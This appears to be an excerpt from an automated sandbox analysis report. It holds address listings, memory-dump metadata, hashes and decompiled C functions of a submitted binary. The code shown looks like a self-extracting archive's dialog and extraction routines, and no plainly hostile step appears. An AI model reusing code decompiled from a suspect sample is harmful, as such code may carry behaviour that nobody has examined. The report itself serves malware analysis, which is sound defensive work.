                0x00000000
                0x003d8b4d
                0x003d8b2b
                0x003d8b32
                0x003d8b39
                0x003d8b84
                0x00000000
                0x003d8b84
                0x00000000
                0x003d8b39
                0x003d8ae2
                0x003d8ae5
                0x003d8aec
                0x003d8af3
                0x003d8af8
                0x003d8afa
                0x00000000
                0x00000000
                0x003d8afc
                0x003d8afe
                0x003d8b01
                0x003d8b01
                0x003d8b07
                0x003d8b0c
                0x00000000
                0x003d8b0c
                0x003d8abd
                0x003d8ac6
                0x003d8ac7
                0x003d8acc
                0x003d8ace
                0x003d8ad1
                0x003d8ad1
                0x003d8ad3
                0x00000000
                0x00000000
                0x00000000
                0x003d8ad3
                0x003d8a6a
                0x003d8a6e
                0x003d8a74
                0x003d8a77
                0x003d8a7b
                0x003d8a83
                0x003d8a84
                0x003d8a87
                0x003d8a8b
                0x003d8a8c
                0x003d8a8f
                0x003d8a91
                0x003d8a97
                0x003d8a9d
                0x003d8a9f
                0x003d8aa5
                0x003d8aac
                0x003d8aaf
                0x003d8aaf
                0x003d8a9d
                0x003d8a8f
                0x003d8a87
                0x003d8a7b
                0x00000000
                0x003d8a6e
                0x003d89dc
                0x003d89df
                0x00000000
                0x00000000
                0x003d89e1
                0x003d89e4
                0x003d89e6
                0x00000000
                0x00000000
                0x003d89ec
                0x003d89ef
                0x003d89f2
                0x00000000
                0x00000000
                0x003d89f8
                0x003d89fb
                0x003d8a02
                0x00000000
                0x00000000
                0x003d8a0a
                0x003d8a11
                0x003d8a14
                0x003d8a19
                0x003d8a1b
                0x003d8a4c
                0x003d8a4c
                0x003d8a50
                0x00000000
                0x00000000
                0x003d8a56
                0x003d8a58
                0x003d8a5a
                0x00000000
                0x003d8a5a
                0x003d8a1d
                0x003d8a21
                0x00000000
                0x00000000
                0x003d8a23
                0x003d8a2b
                0x003d8a2c
                0x003d8a2d
                0x003d8a33
                0x003d8a36
                0x003d8a3d
                0x003d8a42
                0x003d8a43
                0x003d8a44
                0x003d8a47
                0x00000000
                0x003d8a47
                0x003d890d
                0x003d8914
                0x00000000
                0x00000000
                0x003d891c
                0x003d8927
                0x003d892c
                0x003d892f
                0x003d8931
                0x00000000
                0x00000000
                0x003d8933
                0x003d893a
                0x003d893d
                0x00000000
                0x00000000
                0x003d893f
                0x003d8946
                0x003d8950
                0x003d8951
                0x003d898b
                0x003d898d
                0x003d8999
                0x003d89a0
                0x00000000
                0x003d89a0
                0x003d8953
                0x003d8958
                0x003d8966
                0x003d896b
                0x003d896f
                0x003d8975
                0x003d8975
                0x003d8883
                0x003d8868
                0x003d886f
                0x003d8874
                0x003d887b
                0x00000000
                0x003d887b
                0x003d880d
                0x003d8813
                0x003d8818
                0x003d881a
                0x00000000
                0x00000000
                0x003d881c
                0x003d8823
                0x003d8835
                0x003d8837
                0x00000000
                0x003d8837
                0x003d8826
                0x003d882c
                0x003d8831
                0x003d8833
                0x00000000
                0x00000000
                0x00000000
                0x003d8833
                0x003d87dc
                0x003d87df
                0x00000000
                0x00000000
                0x00000000
                0x003d87df
                0x003d87ce
                0x003d87d5
                0x00000000
                0x00000000
                0x00000000
                0x003d87d5
                0x003d879e
                0x003d87a5
                0x00000000
                0x00000000
                0x003d87a7
                0x003d87ab
                0x003d87b1
                0x00000000
                0x00000000
                0x00000000
                0x003d87b1
                0x003d874f
                0x003d8752
                0x003d8754
                0x00000000
                0x00000000
                0x00000000
                0x003d8754
                0x003d8726
                0x003d8726
                0x003d872c
                0x003d872f
                0x003d8732
                0x003d8734
                0x00000000
                0x00000000
                0x003d873a
                0x003d873a
                0x00000000
                0x003d873a
                0x003d8705
                0x003d8708
                0x003d870e
                0x00000000
                0x00000000
                0x003d8710
                0x003d8716
                0x00000000
                0x00000000
                0x003d871c
                0x00000000
                0x003d871c
                0x003d85cd
                0x003d85d3
                0x00000000
                0x00000000
                0x003d85d5
                0x003d85dc
                0x00000000
                0x00000000
                0x00000000
                0x003d85dc
                0x003d85a6
                0x003d85b0
                0x003d85b0
                0x003d85b6
                0x00000000
                0x003d85b6
                0x003d85a8
                0x003d85ae
                0x00000000
                0x00000000
                0x00000000
                0x003d85ae
                0x003d8588
                0x003d8592
                0x003d8592
                0x003d8598
                0x00000000
                0x003d8598
                0x003d858a
                0x003d8590
                0x00000000
                0x00000000
                0x00000000
                0x003d8590
                0x003d84f8
                0x003d851c
                0x003d851f
                0x00000000
                0x00000000
                0x003d8521
                0x003d8528
                0x00000000
                0x00000000
                0x003d852a
                0x003d852b
                0x003d852c
                0x003d852d
                0x003d852e
                0x003d8533
                0x003d8535
                0x003d8558
                0x003d856c
                0x003d8574
                0x00000000
                0x003d8574
                0x003d8537
                0x003d853e
                0x00000000
                0x003d84fa
                0x003d8501
                0x003d850e
                0x003d850e
                0x00000000
                0x003d8501
                0x003d84f8
                0x003d84c4
                0x00000000
                0x00000000
                0x003d84c6
                0x003d84c7
                0x003d84c8
                0x003d84cb
                0x003d84cc
                0x003d84cd
                0x003d84d7
                0x00000000
                0x003d84d9
                0x003d84d9
                0x003d84dc
                0x00000000
                0x003d84dc

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: ce1e106b1ffa4d87bc7b992306666e4d2c677d4ea2513a552e21ba9bef202b64
                • Instruction ID: f4cb694ee102617f6cdb67b182956b26e3b9a074a134a93ebb03f83d559b5503
                • Opcode Fuzzy Hash: ce1e106b1ffa4d87bc7b992306666e4d2c677d4ea2513a552e21ba9bef202b64
                • Instruction Fuzzy Hash: 9382EC72904145AEDF17DF64E891BFAB779AF05300F0941BBD8499F382DB316A88CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EF9D5() {
                				_Unknown_base(*)()* _t1;
                
                				_t1 = SetUnhandledExceptionFilter(E003EF9F0); // executed
                				return _t1;
                			}




                0x003ef9da
                0x003ef9e0

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_0001F9F0,003EF3A5), ref: 003EF9DA
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: d6b6e7f875f4cfbfa595505cf728241b89dd0c3d0eb9f0bfce9e6936dc5ab238
                • Instruction ID: 5d1069e19836aa7d415896e5dad74379184a1731a19ae23787e69aecb9de3c00
                • Opcode Fuzzy Hash: d6b6e7f875f4cfbfa595505cf728241b89dd0c3d0eb9f0bfce9e6936dc5ab238
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E003E6CDC(signed int __ecx, void* __edx) {
                				void* __ebp;
                				intOrPtr _t166;
                				intOrPtr _t170;
                				signed int _t176;
                				signed int _t179;
                				intOrPtr _t182;
                				signed int _t185;
                				signed int _t186;
                				void* _t189;
                				void* _t196;
                				signed int _t201;
                				signed int _t202;
                				intOrPtr* _t203;
                				signed int _t206;
                				void* _t217;
                				intOrPtr _t220;
                				signed int _t223;
                				signed int _t226;
                				signed int _t230;
                				signed int _t232;
                				intOrPtr _t235;
                				intOrPtr* _t236;
                				intOrPtr* _t242;
                				intOrPtr* _t244;
                				void* _t247;
                				signed int _t249;
                				signed int _t250;
                				signed int _t252;
                				intOrPtr _t257;
                				signed int _t265;
                				intOrPtr* _t269;
                				intOrPtr _t272;
                				signed int _t275;
                				signed int _t276;
                				signed int _t278;
                				intOrPtr* _t280;
                				intOrPtr* _t282;
                				void* _t283;
                				signed int _t284;
                				intOrPtr* _t285;
                				intOrPtr _t287;
                				void* _t289;
                				void* _t290;
                				void* _t292;
                
                				_t223 = __ecx; // executed
                				E003E359E(__ecx, __edx); // executed
                				E003E4D0A(__ecx,  *((intOrPtr*)(_t290 + 0x244)));
                				_t282 = _t223 + 0x18;
                				_t249 = 0;
                				 *((intOrPtr*)(_t290 + 0x14)) = _t282;
                				if( *(_t223 + 0x1c) +  *(_t223 + 0x1c) == 0) {
                					 *((intOrPtr*)(_t290 + 0x14)) = _t282;
                				} else {
                					_t247 = 0;
                					do {
                						_t220 =  *_t282;
                						_t247 = _t247 + 0x4ae4;
                						_t249 = _t249 + 1;
                						 *((char*)(_t220 + _t247 - 0x13)) = 0;
                						 *((char*)(_t220 + _t247 - 0x11)) = 0;
                					} while (_t249 <  *(_t223 + 0x1c) +  *(_t223 + 0x1c));
                				}
                				_t226 = 5;
                				memcpy( *_t282 + 0x18, _t223 + 0x8c, _t226 << 2);
                				E003F0320( *_t282 + 0x30, _t223 + 0xa0, 0x4a9c);
                				_t292 = _t290 + 0x18;
                				 *(_t292 + 0x30) = 0;
                				_t265 = 0;
                				 *((char*)(_t292 + 0x1b)) = 0;
                				 *((char*)(_t292 + 0x13)) = 0;
                				while(1) {
                					L6:
                					_t272 = 0;
                					 *((intOrPtr*)(_t292 + 0x1c)) = 0;
                					while(1) {
                						L7:
                						_push(0x00400000 - _t265 & 0xfffffff0);
                						_push( *((intOrPtr*)(_t223 + 0x20)) + _t265);
                						_t166 = E003DD114( *_t223);
                						 *((intOrPtr*)(_t292 + 0x34)) = _t166;
                						if(_t166 < 0) {
                							break;
                						}
                						_t265 = _t265 + _t166;
                						 *(_t292 + 0x2c) = _t265;
                						if(_t265 != 0) {
                							if(_t166 <= 0 || _t265 >= 0x400) {
                								if(_t272 >= _t265) {
                									goto L69;
                								} else {
                									while(1) {
                										_t252 = 0;
                										 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
                										 *(_t292 + 0x24) = 0;
                										_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
                										if(_t176 != 0) {
                										}
                										L13:
                										_t235 = 0;
                										 *((intOrPtr*)(_t292 + 0x20)) = 0;
                										while(1) {
                											_t280 =  *_t282 + _t235;
                											 *(_t292 + 0x30) = _t252;
                											_t29 = _t280 + 4; // 0x4
                											_t236 = _t29;
                											 *_t280 = _t223;
                											if( *((char*)(_t280 + 0x4ad3)) == 0) {
                												goto L16;
                											}
                											L15:
                											 *(_t280 + 0x4acc) = _t265;
                											L18:
                											_t42 = _t280 + 0x18; // 0x18
                											_t285 = _t42;
                											 *((char*)(_t280 + 0x4ad3)) = 0;
                											 *(_t280 + 0x4ae0) = _t252;
                											 *((char*)(_t280 + 0x4ad2)) = _t176 & 0xffffff00 |  *((intOrPtr*)(_t292 + 0x34)) == 0x00000000;
                											if( *((char*)(_t280 + 0x14)) != 0) {
                												L23:
                												if( *((char*)(_t292 + 0x1b)) != 0 ||  *_t285 > 0x20000) {
                													 *((char*)(_t280 + 0x4ad1)) = 1;
                													 *((char*)(_t292 + 0x1b)) = 1;
                												} else {
                													 *(_t292 + 0x28) =  *(_t292 + 0x28) + 1;
                												}
                												_t287 =  *((intOrPtr*)(_t292 + 0x1c)) +  *((intOrPtr*)(_t280 + 0x24)) +  *_t285;
                												_t252 = _t252 + 1;
                												 *((intOrPtr*)(_t292 + 0x1c)) = _t287;
                												_t235 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
                												 *(_t292 + 0x24) = _t252;
                												 *((intOrPtr*)(_t292 + 0x20)) = _t235;
                												_t217 = _t265 - _t287;
                												if(_t217 < 0 ||  *((char*)(_t280 + 0x28)) == 0) {
                													if(_t217 >= 0x400) {
                														_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
                														if(_t252 < _t176) {
                															_t282 =  *((intOrPtr*)(_t292 + 0x14));
                															_t280 =  *_t282 + _t235;
                															 *(_t292 + 0x30) = _t252;
                															_t29 = _t280 + 4; // 0x4
                															_t236 = _t29;
                															 *_t280 = _t223;
                															if( *((char*)(_t280 + 0x4ad3)) == 0) {
                																goto L16;
                															}
                														}
                													}
                												}
                											} else {
                												_push(_t285);
                												_push(_t236);
                												 *((char*)(_t280 + 0x14)) = 1;
                												if(E003E3E0B(_t223) == 0 ||  *((char*)(_t280 + 0x29)) == 0 &&  *((char*)(_t223 + 0xe662)) == 0) {
                													 *((char*)(_t292 + 0x13)) = 1;
                												} else {
                													_t252 =  *(_t292 + 0x24);
                													 *((char*)(_t223 + 0xe662)) = 1;
                													goto L23;
                												}
                											}
                											break;
                											L16:
                											E003DA85A(_t236,  *((intOrPtr*)(_t223 + 0x20)) +  *((intOrPtr*)(_t292 + 0x1c)));
                											_t33 = _t280 + 4; // 0x4
                											_t236 = _t33;
                											 *((intOrPtr*)(_t236 + 4)) = 0;
                											_t176 = _t265 -  *((intOrPtr*)(_t292 + 0x1c));
                											__eflags = _t176;
                											 *_t236 = 0;
                											 *(_t280 + 0x4acc) = _t176;
                											if(_t176 != 0) {
                												 *((char*)(_t280 + 0x4ad0)) = 0;
                												 *((char*)(_t280 + 0x14)) = 0;
                												 *((char*)(_t280 + 0x2c)) = 0;
                												_t252 =  *(_t292 + 0x24);
                												goto L18;
                											}
                											break;
                										}
                										L33:
                										_t232 =  *(_t292 + 0x28);
                										_t275 = _t232 /  *(_t223 + 0x1c);
                										_t179 = _t232;
                										__eflags = _t179 %  *(_t223 + 0x1c);
                										if(_t179 %  *(_t223 + 0x1c) != 0) {
                											_t275 = _t275 + 1;
                											__eflags = _t275;
                										}
                										_t283 = 0;
                										__eflags = _t232;
                										if(_t232 != 0) {
                											_t269 =  *((intOrPtr*)(_t292 + 0x14));
                											_t257 = 0;
                											_t202 = _t275 * 0x4ae4;
                											__eflags = _t202;
                											 *((intOrPtr*)(_t292 + 0x20)) = 0;
                											 *(_t292 + 0x38) = _t202;
                											_t203 = _t292 + 0x40;
                											do {
                												_t258 = _t257 +  *_t269;
                												_t244 = _t203;
                												 *((intOrPtr*)(_t292 + 0x3c)) = _t203 + 8;
                												_t206 =  *(_t292 + 0x28) - _t283;
                												 *_t244 = _t257 +  *_t269;
                												__eflags = _t275 - _t206;
                												if(_t275 < _t206) {
                													_t206 = _t275;
                												}
                												__eflags =  *(_t292 + 0x24) - 1;
                												 *(_t244 + 4) = _t206;
                												if( *(_t292 + 0x24) != 1) {
                													E003E0F86( *((intOrPtr*)(_t223 + 0x14)), E003E77C0, _t244);
                												} else {
                													E003E7153(_t223, _t258);
                												}
                												_t283 = _t283 + _t275;
                												_t257 =  *((intOrPtr*)(_t292 + 0x20)) +  *(_t292 + 0x38);
                												_t203 =  *((intOrPtr*)(_t292 + 0x3c));
                												 *((intOrPtr*)(_t292 + 0x20)) = _t257;
                												__eflags = _t283 -  *(_t292 + 0x28);
                											} while (_t283 <  *(_t292 + 0x28));
                											_t265 =  *(_t292 + 0x2c);
                										}
                										_t284 =  *(_t292 + 0x24);
                										__eflags = _t284;
                										if(_t284 == 0) {
                											_t272 =  *((intOrPtr*)(_t292 + 0x1c));
                											goto L68;
                										} else {
                											E003E11CF( *((intOrPtr*)(_t223 + 0x14)));
                											_t276 = 0;
                											__eflags = _t284;
                											if(_t284 == 0) {
                												L55:
                												__eflags =  *((char*)(_t292 + 0x13));
                												if( *((char*)(_t292 + 0x13)) == 0) {
                													_t182 =  *((intOrPtr*)(_t292 + 0x1c));
                													_t278 = _t265 - _t182;
                													__eflags = _t278 - 0x400;
                													if(_t278 < 0x400) {
                														__eflags = _t278;
                														if(__eflags >= 0) {
                															if(__eflags > 0) {
                																__eflags = _t182 +  *((intOrPtr*)(_t223 + 0x20));
                																E003F0320( *((intOrPtr*)(_t223 + 0x20)), _t182 +  *((intOrPtr*)(_t223 + 0x20)), _t278);
                																_t292 = _t292 + 0xc;
                															}
                															_t282 =  *((intOrPtr*)(_t292 + 0x14));
                															_t265 = _t278;
                															goto L6;
                														}
                													} else {
                														_t282 =  *((intOrPtr*)(_t292 + 0x14));
                														_t272 = _t182;
                														__eflags = _t272 - _t265;
                														if(_t272 >= _t265) {
                															goto L7;
                														} else {
                															_t252 = 0;
                															 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
                															 *(_t292 + 0x24) = 0;
                															_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
                															if(_t176 != 0) {
                															}
                															goto L33;
                														}
                													}
                												}
                											} else {
                												_t185 = 0;
                												__eflags = 0;
                												 *((intOrPtr*)(_t292 + 0x20)) = 0;
                												do {
                													_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14)))) + _t185;
                													__eflags =  *((char*)(_t289 + 0x4ad1));
                													if( *((char*)(_t289 + 0x4ad1)) != 0) {
                														L50:
                														_t186 = E003E77EF(_t223, _t289);
                														__eflags = _t186;
                														if(_t186 != 0) {
                															goto L51;
                														}
                													} else {
                														_t201 = E003E390D(_t223, _t289);
                														__eflags = _t201;
                														if(_t201 != 0) {
                															__eflags =  *((char*)(_t289 + 0x4ad1));
                															if( *((char*)(_t289 + 0x4ad1)) == 0) {
                																L51:
                																__eflags =  *((char*)(_t289 + 0x4ad0));
                																if( *((char*)(_t289 + 0x4ad0)) == 0) {
                																	__eflags =  *((char*)(_t289 + 0x4ad3));
                																	if( *((char*)(_t289 + 0x4ad3)) != 0) {
                																		_t241 =  *((intOrPtr*)(_t223 + 0x20));
                																		_t189 =  *((intOrPtr*)(_t289 + 0x10)) -  *((intOrPtr*)(_t223 + 0x20)) +  *(_t289 + 4);
                																		__eflags = _t265 - _t189;
                																		if(_t265 > _t189) {
                																			_t265 = _t265 - _t189;
                																			 *(_t292 + 0x38) = _t265;
                																			E003F0320(_t241, _t189 + _t241, _t265);
                																			_t292 = _t292 + 0xc;
                																			 *((intOrPtr*)(_t289 + 0x18)) =  *((intOrPtr*)(_t289 + 0x18)) +  *(_t289 + 0x20) -  *(_t289 + 4);
                																			 *(_t289 + 0x24) =  *(_t289 + 0x24) & 0x00000000;
                																			 *(_t289 + 0x20) =  *(_t289 + 0x20) & 0x00000000;
                																			 *(_t289 + 4) =  *(_t289 + 4) & 0x00000000;
                																			 *((intOrPtr*)(_t289 + 0x10)) =  *((intOrPtr*)(_t223 + 0x20));
                																			__eflags = _t276;
                																			if(_t276 != 0) {
                																				_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
                																				E003F0320(_t196, _t289, 0x4ae4);
                																				_t242 =  *((intOrPtr*)(_t292 + 0x20));
                																				_t292 = _t292 + 0xc;
                																				 *((intOrPtr*)( *_t242 + 0x4ad4)) =  *((intOrPtr*)(_t196 + 0x4ad4));
                																				 *((intOrPtr*)( *_t242 + 0x4adc)) =  *((intOrPtr*)(_t196 + 0x4adc));
                																				_t265 =  *(_t292 + 0x2c);
                																				 *((char*)(_t289 + 0x4ad3)) = 0;
                																			}
                																			_t272 = 0;
                																			 *((intOrPtr*)(_t292 + 0x1c)) = 0;
                																			L68:
                																			_t282 =  *((intOrPtr*)(_t292 + 0x14));
                																			goto L69;
                																		}
                																	} else {
                																		__eflags =  *((char*)(_t289 + 0x28));
                																		if( *((char*)(_t289 + 0x28)) == 0) {
                																			goto L54;
                																		}
                																	}
                																}
                															} else {
                																goto L50;
                															}
                														}
                													}
                													goto L70;
                													L54:
                													_t276 = _t276 + 1;
                													_t185 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
                													 *((intOrPtr*)(_t292 + 0x20)) = _t185;
                													__eflags = _t276 -  *(_t292 + 0x24);
                												} while (_t276 <  *(_t292 + 0x24));
                												goto L55;
                											}
                										}
                										goto L70;
                									}
                								}
                							} else {
                								L69:
                								__eflags =  *((char*)(_t292 + 0x13));
                								if( *((char*)(_t292 + 0x13)) == 0) {
                									continue;
                								}
                							}
                						}
                						break;
                					}
                					L70:
                					 *(_t223 + 0x7c) =  *(_t223 + 0x7c) &  *(_t223 + 0xe6dc);
                					E003E5202(_t223);
                					_t250 =  *(_t292 + 0x30) * 0x4ae4;
                					_t230 = 5;
                					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
                					__eflags = _t170 + _t250 + 0x30;
                					return E003F0320(memcpy(_t223 + 0x8c, _t250 + 0x18 + _t170, _t230 << 2), _t170 + _t250 + 0x30, 0x4a9c);
                				}
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 1d78dbc51c1eae3163f97ac1e6e6689188ffa0bb7ea4053aaf2fbeb316412751
                • Instruction ID: 7ab978624c1b5c712e01b12452462042ef3b6b9befacf427b38c896a69eec6b1
                • Opcode Fuzzy Hash: 1d78dbc51c1eae3163f97ac1e6e6689188ffa0bb7ea4053aaf2fbeb316412751
                • Instruction Fuzzy Hash: F6D116716083908FCB15CF29C84179BBBE1BF99308F09466DE8899B382D774ED05CB56
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E003EB7E0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                				void* __ebx;
                				void* __edi;
                				void* _t105;
                				int _t106;
                				long _t108;
                				long _t109;
                				struct HWND__* _t110;
                				struct HWND__* _t114;
                				void* _t117;
                				void* _t118;
                				void* _t135;
                				void* _t139;
                				signed int _t152;
                				struct HWND__* _t155;
                				void* _t173;
                				int _t186;
                				signed int _t201;
                				void* _t202;
                				long _t210;
                				void* _t220;
                				void* _t234;
                				signed int _t244;
                				void* _t245;
                				void* _t260;
                				long _t262;
                				long _t263;
                				long _t264;
                				int _t278;
                				int _t280;
                				void* _t285;
                				void* _t289;
                				int _t293;
                				void* _t296;
                				WCHAR* _t298;
                				intOrPtr _t299;
                				intOrPtr _t300;
                				struct HWND__* _t311;
                				intOrPtr _t314;
                				void* _t316;
                				struct HWND__* _t317;
                				void* _t318;
                				struct HWND__* _t320;
                				long _t321;
                				struct HWND__* _t322;
                				intOrPtr _t323;
                				void* _t325;
                				void* _t327;
                				void* _t328;
                				void* _t330;
                
                				_t309 = __edx;
                				_t296 = __ecx;
                				E003EEB78(0x402b04, _t328);
                				E003EEC50(0xfe80);
                				_t314 =  *((intOrPtr*)(_t328 + 0xc));
                				_t311 =  *(_t328 + 8);
                				_t105 = E003D1316(__edx, _t311, _t314,  *(_t328 + 0x10),  *((intOrPtr*)(_t328 + 0x14)), L"STARTDLG", 0, 0);
                				_t293 = 1;
                				if(_t105 != 0) {
                					L128:
                					_t106 = _t293;
                					L129:
                					 *[fs:0x0] =  *((intOrPtr*)(_t328 - 0xc));
                					return _t106;
                				}
                				_t316 = _t314 - 0x110;
                				if(_t316 == 0) {
                					_push(_t311);
                					E003ED69E(_t296, __edx, __eflags, __fp0);
                					_t108 =  *0x427b7c;
                					 *0x418450 = _t311;
                					 *0x418458 = _t311;
                					__eflags = _t108;
                					if(_t108 != 0) {
                						SendMessageW(_t311, 0x80, 1, _t108); // executed
                					}
                					_t109 =  *0x42ec84;
                					__eflags = _t109;
                					if(_t109 != 0) {
                						SendDlgItemMessageW(_t311, 0x6c, 0x172, 0, _t109); // executed
                					}
                					_t110 = GetDlgItem(_t311, 0x68);
                					 *(_t328 - 0x14) = _t110;
                					SendMessageW(_t110, 0x435, 0, 0x400000);
                					E003EA64D(_t328 - 0x3474, 0x800);
                					_t114 = GetDlgItem(_t311, 0x66);
                					__eflags =  *0x41a472;
                					_t317 = _t114;
                					 *(_t328 - 0x18) = _t317;
                					_t298 = 0x41a472;
                					if( *0x41a472 == 0) {
                						_t298 = _t328 - 0x3474;
                					}
                					SetWindowTextW(_t317, _t298);
                					E003EABAB(_t317); // executed
                					_push(0x42fca0);
                					_push(0x42fc90);
                					_push(0x42ec90);
                					_push(_t311);
                					 *0x418463 = 0; // executed
                					_t117 = E003EB093(_t298, _t309, __eflags); // executed
                					__eflags = _t117;
                					if(_t117 == 0) {
                						 *0x418456 = _t293;
                					}
                					__eflags =  *0x42fca0;
                					if( *0x42fca0 > 0) {
                						_push(7);
                						_push( *0x42fc90);
                						_push(_t311);
                						E003EC73F(_t309, _t311);
                					}
                					__eflags =  *0x41c577;
                					if( *0x41c577 == 0) {
                						SetDlgItemTextW(_t311, 0x6b, E003DE617(0xbf));
                						SetDlgItemTextW(_t311, _t293, E003DE617(0xbe));
                					}
                					__eflags =  *0x42fca0;
                					if( *0x42fca0 <= 0) {
                						L104:
                						__eflags =  *0x418463;
                						if( *0x418463 != 0) {
                							L116:
                							__eflags =  *0x41a46c - 2;
                							if( *0x41a46c == 2) {
                								EnableWindow(_t317, 0);
                							}
                							__eflags =  *0x419468;
                							if( *0x419468 != 0) {
                								E003D12D3(_t311, 0x67, 0);
                								E003D12D3(_t311, 0x66, 0);
                							}
                							_t118 =  *0x41a46c;
                							__eflags = _t118;
                							if(_t118 != 0) {
                								__eflags =  *0x418454;
                								if( *0x418454 == 0) {
                									_push(0);
                									_push(_t293);
                									_push(0x111);
                									_push(_t311);
                									__eflags = _t118 - _t293;
                									if(_t118 != _t293) {
                										 *0x4330a0();
                									} else {
                										SendMessageW(); // executed
                									}
                								}
                							}
                							__eflags =  *0x418456;
                							if( *0x418456 != 0) {
                								_push(E003DE617(0x90));
                								_push(_t293);
                								L127:
                								SetDlgItemTextW(_t311, ??, ??);
                							}
                							goto L128;
                						}
                						__eflags =  *0x42fc94;
                						if( *0x42fc94 != 0) {
                							goto L116;
                						}
                						__eflags =  *0x41a46c;
                						if( *0x41a46c != 0) {
                							goto L116;
                						}
                						__eflags = 0;
                						_t318 = 0xaa;
                						 *((short*)(_t328 - 0x7874)) = 0;
                						goto L108;
                						do {
                							while(1) {
                								L108:
                								__eflags = _t318 - 0xaa;
                								if(_t318 != 0xaa) {
                									goto L110;
                								}
                								__eflags =  *0x41c577;
                								if( *0x41c577 == 0) {
                									break;
                								}
                								L110:
                								__eflags = _t318 - 0xab;
                								if(__eflags != 0) {
                									L113:
                									E003E05DA(__eflags, _t328 - 0x7874, " ", 0x2000);
                									E003E05DA(__eflags, _t328 - 0x7874, E003DE617(_t318), 0x2000);
                									break;
                								}
                								__eflags =  *0x41c577;
                								if(__eflags == 0) {
                									goto L113;
                								}
                								_t318 = _t318 + 1;
                							}
                							_t318 = _t318 + 1;
                							__eflags = _t318 - 0xb0;
                						} while (__eflags <= 0);
                						_t299 =  *0x418440; // 0x0
                						E003E9ED5(_t299, __eflags,  *0x41102c,  *(_t328 - 0x14), _t328 - 0x7874, 0, 0);
                						_t317 =  *(_t328 - 0x18);
                						goto L116;
                					} else {
                						_push(0);
                						_push( *0x42fc90);
                						_push(_t311); // executed
                						E003EC73F(_t309, _t311); // executed
                						_t135 =  *0x42fc94;
                						__eflags = _t135;
                						if(_t135 != 0) {
                							__eflags =  *0x41a46c;
                							if(__eflags == 0) {
                								_t300 =  *0x418440; // 0x0
                								E003E9ED5(_t300, __eflags,  *0x41102c,  *(_t328 - 0x14), _t135, 0, 0);
                								L003F3E2E( *0x42fc94);
                							}
                						}
                						__eflags =  *0x41a46c - _t293;
                						if( *0x41a46c == _t293) {
                							L103:
                							_push(_t293);
                							_push( *0x42fc90);
                							_push(_t311);
                							E003EC73F(_t309, _t311);
                							goto L104;
                						} else {
                							 *0x4330c0(_t311);
                							__eflags =  *0x41a46c - _t293;
                							if( *0x41a46c == _t293) {
                								goto L103;
                							}
                							__eflags =  *0x41a471;
                							if( *0x41a471 != 0) {
                								goto L103;
                							}
                							_push(3);
                							_push( *0x42fc90);
                							_push(_t311);
                							E003EC73F(_t309, _t311);
                							__eflags =  *0x42fc98;
                							if( *0x42fc98 == 0) {
                								goto L103;
                							}
                							_t139 = DialogBoxParamW( *0x41102c, L"LICENSEDLG", 0, E003EB5C0, 0);
                							__eflags = _t139;
                							if(_t139 == 0) {
                								L23:
                								 *0x418454 = _t293;
